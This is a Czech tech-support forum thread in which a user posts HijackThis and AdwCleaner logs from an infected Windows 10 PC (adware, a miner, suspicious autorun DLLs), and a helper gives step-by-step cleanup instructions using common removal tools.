Hello, today I ran my regular scan with Malwarebytes Anti-Malware and unfortunately it found some 25 trojans. As usual, after removing the viruses I restarted the PC and then scanned everything once more; to my surprise they were there again. Please check my log.
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 19:21:19, on 14.03.2017
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.14393.0953)
Boot mode: Normal
Running processes:
C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Users\Nekut\AppData\Roaming\D3B96F\FC440D.exe
C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Users\Nekut\AppData\Roaming\D3B96F\fc440d.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\SysWOW64\regsvr32.exe
C:\WINDOWS\SysWOW64\regsvr32.exe
C:\Users\Nekut\Downloads\HijackThis.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,SearchAssistant = www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = www.google.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = %11%\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_66\bin\ssv.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_66\bin\jp2ssv.dll
O4 - HKLM\..\Run: [D3B96F] %APPDATA%\D3B96F\FC440D.exe
O4 - HKLM\..\Run: [Autodesk Desktop App] "C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe" -tray
O4 - HKLM\..\Run: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
O4 - HKLM\..\Run: [4StoryPrePatch] C:\Program Files (x86)\GameforgeLive\Games\CZE_ces\4Story\PrePatch.exe
O4 - HKLM\..\Run: [GameforgeLive] "C:\Program Files (x86)\GameforgeLive\gfl_client.exe" -autostart
O4 - HKCU\..\Run: [OneDrive] "C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [DAEMON Tools Lite Automount] "C:\Program Files\DAEMON Tools Lite\DTAgent.exe" -autorun
O4 - HKCU\..\Run: [BitTorrent] "C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe" /MINIMIZED
O4 - HKCU\..\Run: [Steam] "C:\Program Files (x86)\Steam\steam.exe" -silent
O4 - HKCU\..\Run: [D3B96F] %APPDATA%\D3B96F\FC440D.exe
O4 - HKCU\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKCU\..\Run: [SpybotPostWindows10UpgradeReInstall] "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
O4 - HKCU\..\Run: [Opwics] C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe
O4 - HKCU\..\Run: [Ibkjsoft] C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll
O4 - HKCU\..\Run: [Ejcztion] regsvr32.exe C:\Users\Nekut\AppData\Local\Ejcztion\hbsjodvp.dll
O4 - HKUS\S-1-5-19\..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe (User 'Default user')
O4 - Global Startup: O&O Defrag Tray.lnk = ?
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - Trusted IP range: http://192.168.10.1
O15 - ESC Trusted IP range: http://192.168.10.1
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O20 - Winlogon Notify: SDWinLogon - SDWinLogon.dll (file missing)
O23 - Service: Autodesk Desktop App Service (AdAppMgrSvc) - Autodesk Inc. - C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: Disc Soft Lite Bus Service - Disc Soft Ltd - C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: FlexNet Licensing Service 64 - Flexera Software LLC - C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
O23 - Service: Futuremark SystemInfo Service - Futuremark - C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Capability Licensing Service TCP IP Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe
O23 - Service: Intel(R) Security Assist Helper (isaHelperSvc) - Unknown owner - C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\WINDOWS\system32\GameMon.des.exe (file missing)
O23 - Service: NVIDIA LocalSystem Container (NvContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA NetworkService Container (NvContainerNetworkService) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA Display Container LS (NVDisplay.ContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
O23 - Service: NVIDIA Wireless Controller Service - Unknown owner - C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe (file missing)
O23 - Service: NVIDIA Telemetry Container (NvTelemetryContainer) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
O23 - Service: O&O Defrag (OODefragAgent) - O&O Software GmbH - C:\Program Files\OO Software\Defrag\oodag.exe
O23 - Service: Overwolf Updater Windows SCM (OverwolfUpdater) - Overwolf LTD - C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe
O23 - Service: Plusdax - Unknown owner - C:\ProgramData\\Plusdax\\Plusdax.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Spybot-S&D 2 Scanner Service (SDScannerService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
O23 - Service: Spybot-S&D 2 Updating Service (SDUpdateService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
O23 - Service: Spybot-S&D 2 Security Center Service (SDWSCService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\WINDOWS\System32\SensorDataService.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\WINDOWS\system32\TieringEngineService.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 12804 bytes
Please check my log (Solved)
- jaro3
- member of the Security team
Re: Please check my log
Download ATF Cleaner
Double-click ATF Cleaner.exe, click Select All found, then:
- If you use Firefox (Mozilla), click Firefox at the top and choose Select All, then click Empty Selected.
- If you use Opera, click Opera at the top and choose Select All, then click Empty Selected. Then click Main (the main page) and click Empty Selected.
After cleaning, click Exit to close the program.
ATF-Cleaner is a simple tool for removing history from the web browser. The program can remove the cache, cookies, history and other traces of surfing the Internet. Supported browsers include Internet Explorer, Firefox and Opera. The application can also remove temporary Windows files, empty the Recycle Bin, etc.
- If you use only Google Chrome, you do not need to use ATF.
Download TFC
http://www.geekstogo.com/forum/files/fi ... -oldtimer/
Open the file and close all other windows. Click Start to begin the process. The program should not take long.
The PC should then restart; if it does not, restart it yourself.
Download AdwCleaner (by Xplode)
http://www.bleepingcomputer.com/download/adwcleaner/
http://www.adlice.com/downloadprogress/
Save it to your desktop
Close all programs, windows and browsers
Run the program by double-clicking it and click "Scan"
After the scan, click "Logfile"; a "Log Manager" window appears, then double-click the corresponding log, which will open. (It is otherwise saved on the system disk as C:\AdwCleaner [C?].txt.) Paste its entire contents here.
and again:
Download Malwarebytes' Anti-Malware
- During installation, uncheck "Enable free trial of Malwarebytes' Anti-Malware Premium"
Install and run it
- at the end of the installation make sure both options are selected/checked:
Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware; if so, click the Finish button
- If the program is not up to date, click "Update Now" or "Fix Now".
- an update will be found and installed.
- then click Scan Now
- when the program finishes, a message appears at the bottom right; click Save Results, choose Copy to Clipboard and paste the whole log here. Or click "Text file (.txt)" and save the log.
- otherwise the log is located here: C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\Logs
- then click the Finish button and close the program with the X at the top right.
(do not delete anything yet!).
If there are problems, run it in safe mode.
When working with HJT, ComboFix, MbAM, SDFix and similar programs, close all other applications and browsers!
Do not send logs by private message. While I am away, memphisto, Žbeky and Orcus stand in for me.
If you are satisfied, you can support our forum: Support the forum
Re: Please check my log
# AdwCleaner v6.044 - Log vytvořen 15/03/2017 v 17:24:58
# Aktualizováno dne 28/02/2017 z Malwarebytes
# Databáze : 2017-03-15.2 [Server]
# Operační systém : Windows 10 Home (X64)
# Uživatelské jméno : Nekut - DESKTOP-S3S217H
# Spuštěno z : C:\Users\Nekut\Desktop\AdwCleaner.exe
# Mod: Skenování
# Podpora : https://www.malwarebytes.com/support
***** [ Služby ] *****
Služba nalezena: Plusdax
***** [ Složky ] *****
Složka nalezena: C:\Users\Nekut\AppData\Local\globalUpdate
Složka nalezena: C:\Users\Nekut\AppData\Roaming\cpuminer
Složka nalezena: C:\Users\Nekut\AppData\Roaming\ppslog
Složka nalezena: C:\Program Files\NixSrv
Složka nalezena: C:\ProgramData\AVG Security Toolbar
Složka nalezena: C:\ProgramData\Uniblue
Složka nalezena: C:\ProgramData\Plusdaxs
Složka nalezena: C:\ProgramData\Plusdax
Složka nalezena: C:\Program Files (x86)\globalUpdate
Složka nalezena: C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_akaelkiagnbfcccfnmbimdbplecgbikh_0
***** [ Soubory ] *****
Soubor nalezen: C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Soubor nalezen: C:\Users\Nekut\AppData\Roaming\Installer.dat
Soubor nalezen: C:\Users\Nekut\AppData\Roaming\Main.dat
***** [ DLL ] *****
Nebyly nalezeny žádné škodlivé DLL.
***** [ WMI ] *****
Nebyly nalezeny žádné škodlivé klíče.
***** [ Zástupci ] *****
Žádný infikovaný zástupce nenalezen.
***** [ Naplánované úlohy ] *****
Žádná nebezpečná úloha nenalezena.
***** [ Registry ] *****
Klíč nalezen: HKLM\SOFTWARE\6734ebd2-f889-45db-86ff-4cf01bad675d
Klíč nalezen: HKLM\SOFTWARE\7fb7766b-64b0-4740-b3e0-8facee1c2b95
Klíč nalezen: HKLM\SOFTWARE\d5c55897-9fd9-4ce5-9991-7aca12b6be56
Klíč nalezen: HKLM\SOFTWARE\Classes\Installer\Features\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: HKLM\SOFTWARE\Classes\Installer\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\Installer\Features\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\Installer\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: HKLM\SOFTWARE\Classes\driverscanner
Klíč nalezen: HKLM\SOFTWARE\Classes\ppsmb
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\driverscanner
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\ppsmb
Klíč nalezen: HKLM\SOFTWARE\Classes\CLSID\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{A6D54287-7939-466A-8579-92546D946C8C}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
Klíč nalezen: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Klíč nalezen: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5E6A8DA1-5731-465B-B036-B9E16EF26CAC}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Klíč nalezen: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\GlobalUpdate
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\PPStream
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\INSTALLPATH\STATUS
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\mtPlusdax
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Installer
Klíč nalezen: HKCU\Software\GlobalUpdate
Klíč nalezen: HKCU\Software\PPStream
Klíč nalezen: HKCU\Software\INSTALLPATH\STATUS
Klíč nalezen: HKCU\Software\mtPlusdax
Klíč nalezen: HKLM\SOFTWARE\GlobalUpdate
Klíč nalezen: HKLM\SOFTWARE\SimpleFiles
Klíč nalezen: HKLM\SOFTWARE\SupDp
Klíč nalezen: HKLM\SOFTWARE\Uniblue
Klíč nalezen: HKLM\SOFTWARE\Uniblue\DriverScanner
Klíč nalezen: HKLM\SOFTWARE\SUPDP
Klíč nalezen: HKLM\SOFTWARE\mtPlusdax
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
Klíč nalezen: [x64] HKCU\Software\GlobalUpdate
Klíč nalezen: [x64] HKCU\Software\PPStream
Klíč nalezen: [x64] HKCU\Software\INSTALLPATH\STATUS
Klíč nalezen: [x64] HKCU\Software\mtPlusdax
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
Data nalezena: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Klíč nalezen: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
Data nalezena: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Klíč nalezen: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
Data nalezena: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Klíč nalezen: HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\mysearch.avg.com
Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\inst.shoppingate.
Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\shoppingate.info
Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\inst.shoppingate.inf
Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\shoppingate.info
Klíč nalezen: [x64] HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\mysearch.avg.com
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\inst.shoppingat
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\shoppingate.inf
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\inst.shoppingate.i
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\shoppingate.info
Hodnota nalezena: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [gpuminer]
Hodnota nalezena: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 [vProt]
Klíč nalezen: HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
Klíč nalezen: [x64] HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
***** [ Internetové prohlížeče ] *****
Nebyly nalezeny žádné škodlivé položky prohlížeče Firefox.
Chromium nastavení nalezeno: [C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - hxxp://www.mystartsearch.com/webfavicon.ico
Chromium nastavení nalezeno: [C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences ] - fcfenmboojpjinhpgggodefccipikbpd
*************************
C:\AdwCleaner\AdwCleaner[S0].txt - [10694 Bajty] - [15/03/2017 17:24:58]
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [10768 Bajty] ##########
Malwarebytes
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 15.03.17
Čas skenování: 17:33
Logovací soubor: malware.txt
Správce: Ano
-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.75
Aktualizovat verzi balíku komponent: 1.0.1509
Licence: Zkušební
-Systémová informace-
OS: Windows 10
CPU: x64
Systém souborů: NTFS
Uživatel: DESKTOP-S3S217H\Nekut
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
